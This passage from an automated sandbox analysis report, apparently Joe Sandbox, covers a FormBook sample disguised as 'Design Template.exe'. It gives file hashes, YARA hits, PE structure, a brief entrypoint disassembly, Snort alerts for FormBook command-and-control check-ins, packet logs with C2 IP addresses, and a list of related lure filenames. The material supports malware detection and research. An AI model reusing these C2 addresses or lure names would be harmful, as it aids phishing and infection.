                                                                              TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.170
                                                                              OVHFRVJNPltkyHyI3CCo.exeGet hashmaliciousBrowse
                                                                              • 66.70.204.222
                                                                              SecuriteInfo.com.Trojan.MinerNET.8.21400.exeGet hashmaliciousBrowse
                                                                              • 51.255.34.118
                                                                              Anmodning om tilbud 12-04-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                              • 167.114.6.31
                                                                              Swift copy.pdf.exeGet hashmaliciousBrowse
                                                                              • 51.222.80.112
                                                                              PO-4147074_pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              kQVi54bTM0.exeGet hashmaliciousBrowse
                                                                              • 5.196.102.93
                                                                              cym4u.exeGet hashmaliciousBrowse
                                                                              • 188.165.17.91
                                                                              Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                              • 51.89.204.5
                                                                              $108,459.00.htmlGet hashmaliciousBrowse
                                                                              • 146.59.152.166
                                                                              LtfVNumoON.exeGet hashmaliciousBrowse
                                                                              • 144.217.30.204
                                                                              giATspz5dw.exeGet hashmaliciousBrowse
                                                                              • 142.4.204.181
                                                                              SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                              • 149.202.83.171
                                                                              SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                              • 91.121.140.167
                                                                              fileshare.docGet hashmaliciousBrowse
                                                                              • 188.165.245.148
                                                                              SecuriteInfo.com.Variant.Bulz.421173.18141.exeGet hashmaliciousBrowse
                                                                              • 51.89.77.2
                                                                              R1210322PIR-2FQUOTATION(P21C00285).exeGet hashmaliciousBrowse
                                                                              • 51.38.214.75
                                                                              Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf_1.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              Purchase Order No.10056.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\Liebert.bmp
                                                                              Process:C:\Users\user\Desktop\Design Template.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):164864
                                                                              Entropy (8bit):7.209205710925533
                                                                              Encrypted:false
                                                                              SSDEEP:3072:CB/2vWJU7SV/DPHojgdtuxB5ukO99VUY7ls0RmunNWOne:qCqfojIg751O99VUenIunEO
                                                                              MD5:5CE9A1DC2873C419D9F42B71EB3B15EA
                                                                              SHA1:C6FE65A2BCD683AD3B07458F382BFD14A24B4E8F
                                                                              SHA-256:FEE88005A72B0DEC13B45092E47B5275498E26BECA1FAE2193AB89E48E689C09
                                                                              SHA-512:68FE533EBB15DB0B4AF7F27733D77652825C0D68E5567536D307C47002514C821DE0D13E3774EB3CEB70E24CC02E747926919C90F6A56A2357761174A84D558B
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: JPCERT/CC Incident Response Group
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:low
                                                                              Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.......}f?.9.QH9.QH9.QH"..Hu.QH"..H:.QH"..H8.QHRich9.QH........PE..L....."<.................r........................@.......................................@..........................................................................................................................................................text...Pp.......r.................. ..`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.277372055729393
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Design Template.exe
                                                                              File size:479232
                                                                              MD5:56d56566623a2bc942141b56f9dd3da5
                                                                              SHA1:bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
                                                                              SHA256:5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
                                                                              SHA512:85f335645b6e92ce0a4cf6c799e03a79f3ca60d19e3cca0dfcb808b08ec7b3e0c0c4f1538097f5ffea270053fb4bc38505d8c127dff3edde05c5181b33691dbf
                                                                              SSDEEP:12288:2Onh/74J2eipNdrLCjD6HBTLaQqP+BfWbMto:2Os2eipNdrLCjDzQfWE
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>M.._#.._#.._#.._#.._#./@).._#.DC-.._#.._".K^#..@0.._#./@(.._#..Y%.._#.Rich._#.........................PE..L.....FX...........

                                                                              File Icon

                                                                              Icon Hash:00828e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x422c4f
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x5846A1E0 [Tue Dec 6 11:32:48 2016 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:896af7d86e4ad5191fa88fd4589e505c

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push FFFFFFFFh
                                                                              push 00441190h
                                                                              push 00424AD4h
                                                                              mov eax, dword ptr fs:[00000000h]
                                                                              push eax
                                                                              mov dword ptr fs:[00000000h], esp
                                                                              sub esp, 58h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [ebp-18h], esp
                                                                              call dword ptr [004331B8h]
                                                                              xor edx, edx
                                                                              mov dl, ah
                                                                              mov dword ptr [0044DF54h], edx
                                                                              mov ecx, eax
                                                                              and ecx, 000000FFh
                                                                              mov dword ptr [0044DF50h], ecx
                                                                              shl ecx, 08h
                                                                              add ecx, edx
                                                                              mov dword ptr [0044DF4Ch], ecx
                                                                              shr eax, 10h
                                                                              mov dword ptr [0044DF48h], eax
                                                                              push 00000001h
                                                                              call 00007F2138E4EA95h
                                                                              pop ecx
                                                                              test eax, eax
                                                                              jne 00007F2138E4CCBAh
                                                                              push 0000001Ch
                                                                              call 00007F2138E4CD78h
                                                                              pop ecx
                                                                              call 00007F2138E4E002h
                                                                              test eax, eax
                                                                              jne 00007F2138E4CCBAh
                                                                              push 00000010h
                                                                              call 00007F2138E4CD67h
                                                                              pop ecx
                                                                              xor esi, esi
                                                                              mov dword ptr [ebp-04h], esi
                                                                              call 00007F2138E4E8B1h
                                                                              call dword ptr [004330A8h]
                                                                              mov dword ptr [0044E65Ch], eax
                                                                              call 00007F2138E4E76Fh
                                                                              mov dword ptr [0044DF38h], eax
                                                                              call 00007F2138E4E518h
                                                                              call 00007F2138E4E45Ah
                                                                              call 00007F2138E4D057h
                                                                              mov dword ptr [ebp-30h], esi
                                                                              lea eax, dword ptr [ebp-5Ch]
                                                                              push eax
                                                                              call dword ptr [004330A4h]
                                                                              call 00007F2138E4E3EBh
                                                                              mov dword ptr [ebp-64h], eax
                                                                              test byte ptr [ebp-30h], 00000001h
                                                                              je 00007F2138E4CCB8h
                                                                              movzx eax, word ptr [ebp+00h]

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS98 (6.0) build 8168
                                                                              • [RES] VS98 (6.0) cvtres build 1720
                                                                              • [C++] VS98 (6.0) build 8168

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x42f480xb4.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x5104d0x1c.cdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x330000x41c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x320000x32000False0.535717773438data6.07259634526IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x330000x120000x12000False0.622328016493data6.95346677981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x450000xa1880x7000False0.887590680804data7.61616666061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .cdata0x500000x284290x29000False0.933629477896data7.95563959987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                              Imports

                                                                              DLLImport
                                                                              OPENGL32.dllglCopyPixels, glFlush, glDisableClientState, glCullFace, glClear
                                                                              KERNEL32.dllRtlUnwind, GetStartupInfoA, GetCommandLineA, ExitProcess, RaiseException, HeapAlloc, HeapFree, TerminateProcess, HeapReAlloc, HeapSize, GetACP, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, SetHandleCount, GetStdHandle, GetFileType, HeapDestroy, HeapCreate, VirtualFree, SetUnhandledExceptionFilter, VirtualAlloc, IsBadWritePtr, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, GetProfileStringA, WriteFile, GetCurrentProcess, SetErrorMode, WritePrivateProfileStringA, GetOEMCP, GetCPInfo, GetProcessVersion, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalFree, LocalAlloc, SizeofResource, MultiByteToWideChar, WideCharToMultiByte, InterlockedIncrement, GetLastError, GlobalFlags, lstrcpynA, MulDiv, SetLastError, InterlockedDecrement, CloseHandle, GetModuleFileNameA, VirtualProtect, GlobalAlloc, GetCurrentThread, lstrlenA, lstrcmpA, LoadLibraryA, FreeLibrary, GetVersion, lstrcatA, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcpyA, GetModuleHandleA, GetProcAddress, GlobalLock, GlobalUnlock, GlobalFree, LockResource, FindResourceA, LoadResource, lstrcmpiA, GetEnvironmentStringsW
                                                                              USER32.dllPeekMessageA, GetSysColor, SendDlgItemMessageA, UpdateWindow, PostMessageA, IsDlgButtonChecked, IsDialogMessageA, SetWindowTextA, ShowWindow, EnableMenuItem, CheckMenuItem, SetMenuItemBitmaps, ModifyMenuA, GetMenuState, LoadBitmapA, GetMenuCheckMarkDimensions, PostQuitMessage, SetCursor, ValidateRect, TranslateMessage, GetMessageA, ClientToScreen, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, DrawTextA, LoadCursorA, GetSysColorBrush, DestroyMenu, LoadStringA, IsWindowVisible, GetTopWindow, MessageBoxA, GetCapture, DispatchMessageA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA, CreateWindowExA, SetWindowsHookExA, CallNextHookEx, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, GetLastActivePopup, GetForegroundWindow, SetForegroundWindow, RegisterWindowMessageA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetNextDlgTabItem, EndDialog, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindowEnabled, GetParent, GetWindow, GetClassNameA, MoveWindow, IsIconic, DrawIcon, LoadIconA, SendMessageA, GrayStringA, GetSystemMetrics, ScreenToClient, PtInRect, GetDC, DrawFrameControl, ReleaseDC, InvalidateRect, GetCursorPos, EqualRect, SetCapture, ReleaseCapture, GetMenu, AdjustWindowRect, EnableWindow, GetWindowRect, GetWindowLongA, SetPropA, UnregisterClassA, HideCaret, ShowCaret, SetWindowPos, GetPropA, CallWindowProcA, BeginDeferWindowPos, MapWindowPoints, DeferWindowPos, EndDeferWindowPos, IsWindow, GetDlgItem, GetFocus, SetFocus, AdjustWindowRectEx, WinHelpA, CopyRect, SetWindowLongA, RemovePropA, GetClientRect, IsWindowUnicode, CharNextA, InflateRect, DefDlgProcA, DrawFocusRect, ExcludeUpdateRgn, GetClassLongA
                                                                              GDI32.dllGetStockObject, SetBkMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, SelectObject, DeleteObject, GetDeviceCaps, CreateSolidBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, RestoreDC, SaveDC, DeleteDC, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateDIBitmap, PatBlt, GetTextExtentPointA, BitBlt, CreateCompatibleDC
                                                                              comdlg32.dllGetOpenFileNameA
                                                                              WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                              ADVAPI32.dllRegSetValueExA, RegCloseKey, RegOpenKeyExA, RegCreateKeyExA
                                                                              COMCTL32.dll

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              04/12/21-14:42:55.970349TCP1201ATTACK-RESPONSES 403 Forbidden804971234.102.136.180192.168.2.7
                                                                              04/12/21-14:43:29.099579TCP1201ATTACK-RESPONSES 403 Forbidden804972834.102.136.180192.168.2.7
                                                                              04/12/21-14:43:40.083059TCP1201ATTACK-RESPONSES 403 Forbidden804973334.102.136.180192.168.2.7
                                                                              04/12/21-14:43:50.506458TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.7
                                                                              04/12/21-14:43:55.885724TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7204.11.56.48
                                                                              04/12/21-14:43:55.885724TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7204.11.56.48
                                                                              04/12/21-14:43:55.885724TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7204.11.56.48

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 12, 2021 14:42:39.167387962 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:39.589288950 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:39.589587927 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:39.589682102 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:40.012196064 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:40.012223959 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:40.012417078 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:40.055970907 CEST4970580192.168.2.747.105.113.141
                                                                              Apr 12, 2021 14:42:40.441804886 CEST804970547.105.113.141192.168.2.7
                                                                              Apr 12, 2021 14:42:55.791845083 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.832835913 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.832917929 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.833060026 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.873897076 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.970349073 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.970376015 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:42:55.970525980 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:55.972614050 CEST4971280192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:42:56.013549089 CEST804971234.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:06.087716103 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:06.316555977 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:06.316780090 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:06.316806078 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:06.545553923 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:06.805433035 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:07.075186014 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:09.141789913 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:09.141813040 CEST8049724156.226.160.56192.168.2.7
                                                                              Apr 12, 2021 14:43:09.142075062 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:09.142097950 CEST4972480192.168.2.7156.226.160.56
                                                                              Apr 12, 2021 14:43:11.909854889 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.049487114 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.049683094 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.049977064 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.192271948 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192353964 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192392111 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192430019 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192467928 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192502975 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192529917 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:12.192528963 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.192778111 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.192960978 CEST4972580192.168.2.7198.50.252.64
                                                                              Apr 12, 2021 14:43:12.332376957 CEST8049725198.50.252.64192.168.2.7
                                                                              Apr 12, 2021 14:43:17.302906036 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.353419065 CEST8049726160.153.136.3192.168.2.7
                                                                              Apr 12, 2021 14:43:17.353622913 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.353806019 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.404323101 CEST8049726160.153.136.3192.168.2.7
                                                                              Apr 12, 2021 14:43:17.404589891 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.404681921 CEST4972680192.168.2.7160.153.136.3
                                                                              Apr 12, 2021 14:43:17.458651066 CEST8049726160.153.136.3192.168.2.7
                                                                              Apr 12, 2021 14:43:23.329819918 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.580332994 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.581245899 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.581275940 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.827841043 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.831491947 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.831516027 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:23.831702948 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:23.831736088 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:24.032521963 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:24.032763958 CEST4972780192.168.2.714.215.190.65
                                                                              Apr 12, 2021 14:43:24.074176073 CEST804972714.215.190.65192.168.2.7
                                                                              Apr 12, 2021 14:43:28.920898914 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:28.962025881 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:28.962302923 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:28.962619066 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:29.003592014 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:29.099579096 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:29.099618912 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:29.099925995 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:29.100064039 CEST4972880192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:29.140958071 CEST804972834.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:39.904767036 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:39.945777893 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:39.945981026 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:39.946073055 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:39.986855030 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:40.083059072 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:40.083096981 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:40.083825111 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:40.083853006 CEST4973380192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:40.125268936 CEST804973334.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.326803923 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.369370937 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.369771957 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.370038033 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.410672903 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.506458044 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.506483078 CEST804973634.102.136.180192.168.2.7
                                                                              Apr 12, 2021 14:43:50.507009983 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.507102013 CEST4973680192.168.2.734.102.136.180
                                                                              Apr 12, 2021 14:43:50.547902107 CEST804973634.102.136.180192.168.2.7

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 12, 2021 14:41:19.943381071 CEST6335453192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:20.002774954 CEST53633548.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:20.252338886 CEST5312953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:20.301002026 CEST53531298.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:21.063261032 CEST6245253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:21.114973068 CEST53624528.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:28.611020088 CEST5782053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:28.660525084 CEST53578208.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:30.808311939 CEST5084853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:30.856991053 CEST53508488.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:40.533992052 CEST6124253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:40.592926025 CEST53612428.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:52.152436018 CEST5856253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:52.211227894 CEST53585628.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:58.336416006 CEST5659053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:58.388233900 CEST53565908.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:41:59.289062023 CEST6050153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:41:59.346138000 CEST53605018.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:15.167821884 CEST5377553192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:15.226773024 CEST53537758.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:24.988890886 CEST5183753192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:25.040378094 CEST53518378.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:30.155750036 CEST5541153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:30.204756021 CEST53554118.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:30.601542950 CEST6366853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:30.660084963 CEST53636688.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:34.022248030 CEST5464053192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:34.084567070 CEST53546408.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:39.103795052 CEST5873953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:39.162935972 CEST53587398.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:45.073788881 CEST6033853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:45.164273024 CEST53603388.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:50.307725906 CEST5871753192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:50.700989962 CEST53587178.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:50.747783899 CEST5976253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:50.813944101 CEST53597628.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:52.261464119 CEST5432953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:52.360915899 CEST53543298.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:53.079898119 CEST5805253192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:53.183572054 CEST53580528.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:54.075596094 CEST5400853192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:54.178920984 CEST53540088.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:54.820456028 CEST5945153192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:54.877789021 CEST53594518.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:55.714117050 CEST6456953192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:55.714190006 CEST5291453192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:55.765783072 CEST53645698.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:55.790788889 CEST53529148.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:56.540268898 CEST5281653192.168.2.78.8.8.8
                                                                              Apr 12, 2021 14:42:56.597579002 CEST53528168.8.8.8192.168.2.7
                                                                              Apr 12, 2021 14:42:57.228183985 CEST5078153192.168.2.78.8.8.8
